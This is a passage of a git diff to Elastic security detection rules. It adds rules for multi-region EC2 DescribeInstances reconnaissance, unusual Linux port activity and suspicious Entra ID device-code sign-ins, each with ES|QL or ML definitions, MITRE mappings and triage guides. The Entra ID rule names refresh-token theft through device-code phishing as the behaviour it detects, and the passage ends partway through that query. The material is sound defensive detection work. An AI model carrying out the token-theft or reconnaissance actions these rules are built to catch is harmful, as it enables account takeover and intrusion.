securing your environment \u2014 ensuring high levels of performance and security. The Network Packet Capture integration captures the network traffic between your application servers, decodes common application layer protocols and records the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"network_traffic\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cNetwork Packet Capture\u201d and select the integration to see more details about it.\n- Click \u201cAdd Network Packet Capture\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cnetwork_traffic\u201d to an existing or a new agent policy, and deploy the agent on your system from which network log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/network_traffic).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + }, + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + }, + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "35f86980-1fb1-4dff-b311-3be941549c8d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_5.json b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_5.json index 469dc192efb..136b0a88b3b 100644 --- a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_5.json @@ -19,7 +19,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_207.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_207.json deleted file mode 100644 index 23e24dd3b6b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_207.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies the creation of an Amazon Relational Database Service (RDS) Security group.", - "false_positives": [ - "An RDS security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS RDS Security Group Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS Security Group Creation\n\nAmazon RDS Security Groups control access to RDS instances, acting as virtual firewalls. Adversaries may exploit this by creating unauthorized security groups to maintain persistence or exfiltrate data. The detection rule monitors successful creation events of RDS security groups, flagging potential misuse by correlating specific AWS CloudTrail logs, thus aiding in identifying unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs for the event.action:CreateDBSecurityGroup to identify the user or role responsible for the creation of the RDS security group.\n- Check the event.provider:rds.amazonaws.com logs to gather additional context about the RDS instance associated with the newly created security group.\n- Investigate the event.outcome:success logs to confirm the successful creation and assess if it aligns with expected administrative activities.\n- Analyze the associated AWS account and user activity to determine if there are any anomalies or unauthorized access patterns.\n- Cross-reference the security group details with existing security policies to ensure compliance and identify any deviations.\n- Evaluate the permissions and rules associated with the new security group to assess potential risks or exposure to sensitive data.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger the rule when authorized personnel create new RDS security groups for legitimate purposes. To manage this, establish a list of known IP addresses or user accounts that frequently perform these tasks and create exceptions for them.\n- Automated deployment tools or scripts that create RDS security groups as part of infrastructure provisioning can lead to false positives. Identify these tools and their associated accounts, then configure the rule to exclude these specific actions.\n- Scheduled maintenance or updates that involve creating new security groups might be flagged. Document these scheduled activities and adjust the rule to recognize and exclude them during the specified time frames.\n- Testing environments where security groups are frequently created and deleted for development purposes can generate alerts. Implement tagging or naming conventions for test environments and exclude these from the rule's scope.\n\n### Response and remediation\n\n- Immediately review the AWS CloudTrail logs to confirm the unauthorized creation of the RDS security group and identify the source IP and user account involved in the action.\n- Revoke any unauthorized security group rules associated with the newly created RDS security group to prevent further unauthorized access or data exfiltration.\n- Temporarily disable or delete the unauthorized RDS security group to contain the threat and prevent persistence.\n- Conduct a thorough audit of all AWS IAM roles and permissions to ensure that only authorized users have the ability to create or modify RDS security groups.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been compromised.\n- Implement additional monitoring and alerting for any future RDS security group creation events to quickly detect and respond to similar threats.\n- Review and update AWS security policies and access controls to prevent unauthorized security group creation, ensuring alignment with best practices for least privilege.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBSecurityGroup and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBSecurityGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "378f9024-8a0c-46a5-aa08-ce147ac73a4e", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1136", - "name": "Create Account", - "reference": "https://attack.mitre.org/techniques/T1136/", - "subtechnique": [ - { - "id": "T1136.003", - "name": "Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1136/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "378f9024-8a0c-46a5-aa08-ce147ac73a4e_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3896d4c0-6ad1-11ef-8c7b-f661ea17fbcc_8.json b/packages/security_detection_engine/kibana/security_rule/3896d4c0-6ad1-11ef-8c7b-f661ea17fbcc_8.json index b310bf55c98..12b0f6bc004 100644 --- a/packages/security_detection_engine/kibana/security_rule/3896d4c0-6ad1-11ef-8c7b-f661ea17fbcc_8.json +++ b/packages/security_detection_engine/kibana/security_rule/3896d4c0-6ad1-11ef-8c7b-f661ea17fbcc_8.json @@ -34,7 +34,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_5.json index 03afd3d2472..d152985482d 100644 --- a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_5.json +++ b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_5.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_7.json b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_7.json new file mode 100644 index 00000000000..3760abb4e4f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_7.json @@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies when a single AWS resource is making `DescribeInstances` API calls in more than 10 regions within a 30-second window. This could indicate a potential threat actor attempting to discover the AWS infrastructure across multiple regions using compromised credentials or a compromised instance. Adversaries may use this information to identify potential targets for further exploitation or to gain a better understanding of the target's infrastructure.", + "false_positives": [ + "Legitimate use of the `DescribeInstances` API call by an AWS resource that requires information about instances in multiple regions.", + "Scheduled tasks or scripts that require information about instances in multiple regions." + ], + "from": "now-6m", + "investigation_fields": { + "field_names": [ + "Esql.cloud_region_count_distinct", + "Esql.event_count", + "Esql.event_timestamp_values", + "aws.cloudtrail.user_identity.arn", + "Esql.aws_cloudtrail_user_identity_type_values", + "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "Esql.source_ip_values", + "Esql.user_agent_original_values", + "Esql.source_as_organization_name_values", + "Esql.cloud_account_id_values", + "Esql.cloud_region_values", + "Esql.data_stream_namespace_values" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS EC2 Multi-Region DescribeInstances API Calls", + "note": "## Triage and analysis\n\n### Investigating AWS EC2 Multi-Region DescribeInstances API Calls\n\nThis rule flags when the `DescribeInstances` API is executed across multiple AWS regions within a short timeframe. While benign in some cases (e.g., asset inventory, legitimate multi-region management), this pattern can indicate a reconnaissance phase in which an adversary enumerates EC2 instances in all regions to identify potential targets across the environment.\n\nBecause the signal can generate significant noise in dynamic or large AWS environments, this rule should be treated as a Building Block Rule (BBR), not a stand-alone alert requiring immediate incident response. Instead, it is best used for hunting, enrichment, correlation, and escalation when combined with other signals.\n\n### How to use this rule (hunting & correlation guide)\n\nThis rule is most effective when paired with other detection rules or data sources. Use it to answer questions such as:\n\n- Did a newly created or unknown principal call `DescribeInstances` across many regions? Pair this with a new terms or first-time principal rule (e.g., `GetCallerIdentity`, `AssumeRole`, or `aws.cloudtrail.user_identity.session_context.session_issuer.arn`). \n- Was the same principal also observed making other discovery or enumeration calls (e.g., `DescribeSnapshots`, `DescribeVolumes`, `DescribeImages`, `DescribeSecurityGroups`) in a short timeframe? \n- Did the multi-region calls precede or coincide with higher-risk actions such as: \n - Snapshot creation or shared snapshot modifications (`CreateSnapshot`, `ModifySnapshotAttribute`) \n - AMI export/copy operations (`ExportImage`, `CopyImage`) \n - Access key creation, role assumption, or IAM permission changes \n - Unexpected S3 bucket or data transfer activity (e.g., large data egress, new S3 bucket writes) \n- Did the activity span regions normally unused or outside the organization's typical operational footprint?\n\n#### Possible investigation steps:\n\n- **Review the principal and session trace**: \n - Identify `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.access_key_id`, and determine whether the principal is known, recently onboarded, or unusual (e.g., a service role used in rare cases). \n - Examine `user_agent.original` and `source.ip` for anomalies (e.g., new CLI/SDK versions, IAM roles from unexpected hosts, geolocation outside expected range).\n\n- **Evaluate region distribution and timing**: \n - Inspect the regions contacted by `DescribeInstances` within the alert window. Are some regions rarely used in your org? \n - Look at the timeline: did the calls occur in rapid succession or spread out? A burst suggests automated reconnaissance rather than manual usage.\n\n- **Correlate with other detection signals & data access patterns**: \n - Query for other CloudTrail events by the same principal in the \u00b130 minutes window: enumeration APIs (`Describe*`), snapshot/AMI events, `CopySnapshot`, `ExportImage`, `StartInstances`, etc. \n - Cross-validate with SIEM or data egress logs: did large volumes of data leave the environment after the enumeration? \n - Review IAM activity for privilege elevation, new access keys, or role chaining that could support the enumeration action.\n\n- **Assess intent and operational context**: \n - Determine whether the enumeration aligns with known asset-inventory or management tasks (Recurring scans, DevOps automation, IT health checks). \n - If this principal is known for asset management, verify the timing, region list, and audit logs for existing tickets/change-records. \n - If the activity is unexpected, low legitimacy, or tied to other suspicious events, escalate.\n\n### False positive analysis:\n\nBecause many organizations have legitimate multi-region cloud operations, this rule may generate false positives. Common benign scenarios include:\n\n- DevOps or cloud-ops automation that inventories EC2 instances across all regions (for cost, compliance, or multi-region deployment verification). \n- Large-scale migrations or disaster-recovery tests that touch many regions in a short time. \n- Security or audit team enumeration of the environment (e.g., internal red-team, internal asset scanning). \n- Cross-account management tools in AWS Organizations that routinely query multiple regions.\n\nTo manage these, consider: \n- Whitelisting known automation roles/principals (with caution). \n- Tagging and excluding known \u201cinventory scan\u201d sessions (based on user agent, IP range, timing). \n- Using this rule only as a correlation trigger and not as a direct alert.\n\n### Response and escalation:\n\nBecause this rule is a BBR, its detection alone does not usually warrant full incident response. Instead:\n\n- **Document the finding** in your hunt log, noting principal, regions, timestamp, and correlation flags (other events). \n- If correlation reveals additional suspicious activity (e.g., snapshot share, data export, IAM privilege change) escalate to full incident response. \n- If the enumeration is determined benign (e.g., approved internal scan), add context (ticket number, owner, justification) and suppress/annotate this principal in future hunts for a defined interval. \n- Update your detection playbooks to reflect this rule\u2019s role as a recon-indicator, and train analysts to use it as a pivot point.\n\n### Additional information\n\nFor further information on AWS `DescribeInstances` permissions and best practices, refer to the [AWS DescribeInstances API documentation](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html).\n", + "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n\n// filter for DescribeInstances API calls\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"ec2.amazonaws.com\"\n and event.action == \"DescribeInstances\"\n\n// truncate the timestamp to a 30-second window\n| eval Esql.time_window_date_trunc = date_trunc(30 seconds, @timestamp)\n\n// keep only the relevant raw fields\n| keep \n Esql.time_window_date_trunc, \n aws.cloudtrail.user_identity.arn, \n cloud.region, \n cloud.account.id,\n aws.cloudtrail.user_identity.access_key_id,\n aws.cloudtrail.user_identity.type,\n user_agent.original,\n source.as.organization.name,\n source.ip,\n @timestamp,\n data_stream.namespace \n\n// count the number of unique regions and total API calls within the 30-second window\n| stats\n Esql.cloud_region_count_distinct = count_distinct(cloud.region),\n Esql.event_count = count(*),\n Esql.event_timestamp_values = VALUES(@timestamp),\n Esql.aws_cloudtrail_user_identity_type_values = VALUES(aws.cloudtrail.user_identity.type),\n Esql.aws_cloudtrail_user_identity_access_key_id_values = VALUES(aws.cloudtrail.user_identity.access_key_id),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.user_agent_original_values = VALUES(user_agent.original),\n Esql.source_as_organization_name_values = VALUES(source.as.organization.name),\n Esql.cloud_account_id_values = VALUES(cloud.account.id),\n Esql.cloud_region_values = VALUES(cloud.region),\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n by Esql.time_window_date_trunc, aws.cloudtrail.user_identity.arn\n\n// filter for resources making DescribeInstances API calls in more than 10 regions within the 30-second window\n| where Esql.cloud_region_count_distinct >= 10 and Esql.event_count >= 10\n", + "references": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_access_key_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_user_identity_type_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_account_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_region_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.cloud_region_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_timestamp_values", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.source_as_organization_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.time_window_date_trunc", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.arn", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "393ef120-63d1-11ef-8e38-f661ea17fbce", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: AWS EC2", + "Resources: Investigation Guide", + "Rule Type: BBR", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1580", + "name": "Cloud Infrastructure Discovery", + "reference": "https://attack.mitre.org/techniques/T1580/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 7 + }, + "id": "393ef120-63d1-11ef-8e38-f661ea17fbce_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3c7e32e6-6104-46d9-a06e-da0f8b5795a0_108.json b/packages/security_detection_engine/kibana/security_rule/3c7e32e6-6104-46d9-a06e-da0f8b5795a0_108.json new file mode 100644 index 00000000000..4045239d417 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3c7e32e6-6104-46d9-a06e-da0f8b5795a0_108.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "Identifies unusual destination port activity that can indicate command-and-control, persistence mechanism, or data exfiltration activity. Rarely used destination port activity is generally unusual in Linux fleets, and can indicate unauthorized access or threat actor activity.", + "false_positives": [ + "A newly installed program or one that rarely uses the network could trigger this alert." + ], + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": [ + "v3_linux_anomalous_network_port_activity" + ], + "name": "Unusual Linux Network Port Activity", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Linux Network Port Activity\n\nIn Linux environments, network ports facilitate communication between applications and services. Adversaries may exploit rarely used ports for covert command-and-control, persistence, or data exfiltration, bypassing standard monitoring. The 'Unusual Linux Network Port Activity' detection rule leverages machine learning to identify anomalies in port usage, flagging potential unauthorized access or threat actor activity by highlighting deviations from typical network behavior.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific unusual destination port and the associated source and destination IP addresses.\n- Check historical network logs to determine if the identified port has been used previously and assess the frequency and context of its usage.\n- Investigate the source IP address to determine if it is associated with known internal systems or if it is an external or unexpected source.\n- Analyze the destination IP address to verify if it is a legitimate endpoint within the network or an external entity that requires further scrutiny.\n- Correlate the unusual port activity with any recent changes or updates in the network environment that might explain the anomaly.\n- Examine any related process or application logs on the involved Linux systems to identify the application or service responsible for the network activity.\n- Consider reaching out to the system owner or administrator for additional context or to verify if the activity is expected or authorized.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when using non-standard ports for legitimate purposes. Users can create exceptions for known administrative tools and scripts that consistently use these ports.\n- Internal applications or services might use uncommon ports for inter-service communication. Identify these applications and whitelist their port usage to prevent unnecessary alerts.\n- Security tools and monitoring solutions sometimes scan or probe network ports as part of their operations. Recognize these tools and exclude their activities from the rule to avoid false positives.\n- Development and testing environments often experiment with various port configurations. Establish a separate monitoring profile for these environments to reduce noise in production alerts.\n- Custom or legacy applications may operate on non-standard ports due to historical configurations. Document these applications and adjust the rule to accommodate their expected behavior.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Conduct a thorough review of the system's network connections and terminate any suspicious or unauthorized connections.\n- Analyze system logs to identify any malicious processes or scripts that may have been executed, and remove or quarantine any identified threats.\n- Change all credentials associated with the affected system, especially if there is any indication of credential compromise.\n- Restore the system from a known good backup if any unauthorized changes or malware are detected.\n- Implement network segmentation to limit the exposure of critical systems to potential threats and reduce the risk of lateral movement.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "risk_score": 21, + "rule_id": "3c7e32e6-6104-46d9-a06e-da0f8b5795a0", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Auditd Manager\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + }, + { + "id": "T1571", + "name": "Non-Standard Port", + "reference": "https://attack.mitre.org/techniques/T1571/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "3c7e32e6-6104-46d9-a06e-da0f8b5795a0_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json b/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json new file mode 100644 index 00000000000..cf49cefd69e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json @@ -0,0 +1,176 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies concurrent Entra ID sign-in events for the same user and session from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources.", + "false_positives": [ + "Users authenticating from multiple devices and using the deviceCode protocol or the Visual Studio Code client." + ], + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode", + "note": "## Triage and analysis\n\n### Investigating Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode\n\n### Possible investigation steps\n\n- Review the sign-in logs to assess the context and reputation of the source.ip address.\n- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious.\n- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise.\n- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.\n- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.\n\n### Response and remediation\n\n- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.\n- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.\n- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.\n- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.\n- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.\n- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.", + "query": "from logs-azure.signinlogs-* metadata _id, _version, _index\n\n| where event.category == \"authentication\" and event.dataset == \"azure.signinlogs\" and\n azure.signinlogs.properties.original_transfer_method == \"deviceCodeFlow\"\n\n| Eval Esql.interactive_logon = CASE(azure.signinlogs.category == \"SignInLogs\", source.ip, null),\n Esql.non_interactive_logon = CASE(azure.signinlogs.category == \"NonInteractiveUserSignInLogs\", source.ip, null)\n\n| stats Esql.count_logon = count(*),\n Esql.timestamp_values = values(@timestamp),\n Esql.source_ip_count_distinct = count_distinct(source.ip),\n Esql.is_interactive = count(Esql.interactive_logon),\n Esql.is_non_interactive = count(Esql.non_interactive_logon),\n Esql.user_agent_count_distinct = COUNT_DISTINCT(user_agent.original),\n Esql.user_agent_values = VALUES(user_agent.original),\n Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_display_name),\n Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_id),\n Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name),\n Esql.azure_signinlogs_properties_auth_requirement_values = 